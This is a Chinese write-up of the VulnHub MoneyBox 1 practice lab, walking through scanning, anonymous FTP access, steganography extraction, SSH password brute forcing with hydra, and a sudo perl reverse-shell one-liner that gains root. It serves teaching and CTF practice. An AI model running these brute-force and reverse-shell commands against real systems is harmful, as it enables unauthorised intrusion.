Description

本次靶机来自vulnhub MONEYBOX 1 。靶机中存在3个flag,本次目标是拿到这3个flag,废话不多说开始吧。

扫描与服务识别

靶机与Kali处在同一网段,通过二层扫描(arp-scan)同网段的存活IP

sudo arp-scan -I eth0 -l  # -I 网卡 -l 本地网络

通过判断,192.168.54.250为靶机地址。

扫描该靶机的开放端口

sudo nmap -p- 192.168.54.250

发现21,22,80端口,对这些端口进行服务识别

sudo nmap -p21,22,80 -sV 192.168.54.250

发现了目标开放了ftp服务,ssh以及web服务

漏洞扫描

使用nmap利用默认脚本扫描是否存在服务漏洞

sudo nmap -p21 -sC 192.168.54.250   # -sC 默认脚本

扫描发现ftp存在匿名登陆漏洞

ssh和http服务没有发现什么异常

整理分析

匿名用户登陆

先利用发现的匿名登陆漏洞

用账号密码anonymous/anonymous登陆成功,并且发现一张图片trytofind.jpg

将图片下载至本地(图片可能藏着某些信息)

访问web服务

查看源码发现,没有发现什么信息

目录爆破

爆破网站目录(dirsearch需要安装)

dirsearch -u http://192.168.54.250/

发现一个博客页面

根据页面内容,在页面源码中发现提示,存在秘密目录S3cr3t-T3xt

访问目录

在页面源码中发现一个密钥3xtr4ctd4t4

图片隐写

通过strings命令查看图片中是否有什么明显的字符信息

strings trytofind.jpg

虽然没有直接看到明显信息,但看到异常字符,客图片里插入什么

用steghide查看插入的数据

steghide info trytofind.jpg

发现需要密码,用之前的获得的密钥3xtr4ctd4t4尝试

成功,发现存在一个data.txt文件

提取信息

steghide extract -sf trytofind.jpg

ssh爆破

查看data文件

发现几个关键字眼,人名renu,密码很弱,可以判断renu可能是一个账号且存在弱口令问题,可以进行暴力破解

首先先找一个字典(/usr/share/wordlists/rockyou.txt.gz)

cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz

这里可以用nmap的ssh爆破脚本,也可以用hydra

nmap --script ssh-brute --script-args userdb=user.txt,passdb=rockyou.txt 192.168.54.250

使用hydra

hydra -l renu -P rockyou.txt 192.168.54.250 ssh

破解成功

账号密码为renu/987654321

获取Flag

ssh连接到renu账号

查看目录

成功获得第一个Flag

尝试sudo到root用户

由于不在超级用户组,权限不够

查看历史命令history

history

发现一个lily用户,并且有通过ssh登陆的痕迹

进入home目录里的lily用户文件,发现第二个Flag

进入lily下的.ssh文件夹和renu的.ssh文件夹

发现lily的authorized_keys存在renu的公钥,因此renu可以直接通过ssh登陆到lily账号。

查看lily用户的权限信息

发现lily用户可以在不使用密码的情况下使用Perl程序

在kali上监听3334端口

nc -nvlp 3334

利用perl程序运行反弹shell

sudo perl -e 'use Socket;$i="192.168.54.103";$p=3334;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

连接成功,获得root权限

进入root根目录

发现.root.txt文件,获得最后一个Flag

Vulnhub-Moneybox相关推荐

  1. 看完这篇 教你玩转渗透测试靶机vulnhub——MoneyBox: 1

    Vulnhub靶机MoneyBox: 1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:FTP匿名登入: ...

  2. Vulnhub实战-MoneyBox

    描述: 主机探测: 端口扫描: nmap -T4 -A -v 192.168.199.134 靶机开放了4个端口,21,22,80,其中21端口可以无验证登录. 使用msf扫描一下,是否可以匿名登录. ...

  3. 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!

    Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...

  4. Vulnhub靶机渗透之 RAVEN: 1

    目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...

  5. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  6. 【Vulnhub靶机系列】DC2

    基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...

  7. 【Vulnhub靶机系列】DC1

    基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...

  8. 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞

    JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 复现漏洞 序列化数据生成 发送POC ...

  9. 靶场练习第二十二天~vulnhub靶场之Momentum-2

    一.准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端 ...

最新文章

  1. Oracle 10g新增DROP DATABASE命令
  2. origin+matlab基础绘图
  3. Vimium - 让Chrome高效工作的神器
  4. Java之基础(1) - 编程中“为了性能”尽量要做到的一些地方
  5. 推荐5款学Java开发的必备工具
  6. 辅助判卷程序项目的扩展--自动出题
  7. 图解 IDEA 中 springboot 项目 MyBatis Generator 逆向生成实体类及 mapper 配置文件
  8. java imagemagick 接口_ImageMagick安装及使用教程
  9. 【心情】bjdldrz
  10. 任务调度(三)——Timer的替代品ScheduledExecutorService简单介绍
  11. git 查看自己的用户名和邮箱
  12. Ehcahe spring
  13. 办公自动化:PDF文件合并器,将多个PDF文件进行合并...
  14. python 关联矩阵_创建关联矩阵
  15. springboot 网页聊天室
  16. 液晶屏背光LED驱动电路设计参考
  17. 为文字添加下划线和中划线
  18. 594. Longest Harmonious Subsequence
  19. java Base64加密解密中文乱码处理
  20. 360加速插件谷歌字体服务停止运行

热门文章

  1. cli模式下php会超时吗,php cli模式下调试
  2. 解决黑苹果 App Store 无限输入密码的方法
  3. 微博封禁117个百万大V账号!
  4. Logcat 的使用方法
  5. rpcx服务框架浅析3-服务发布流程
  6. 如何引入iconfont中的单色图标和多色图标(超简单)
  7. adb 查看手机的ip地址
  8. 主机一键巡检脚本--基于python实现
  9. java hypot_Java StrictMath hypot()方法
  10. 华为nova5里面有用到鸿蒙吗,华为nova7se是不是鸿蒙系统?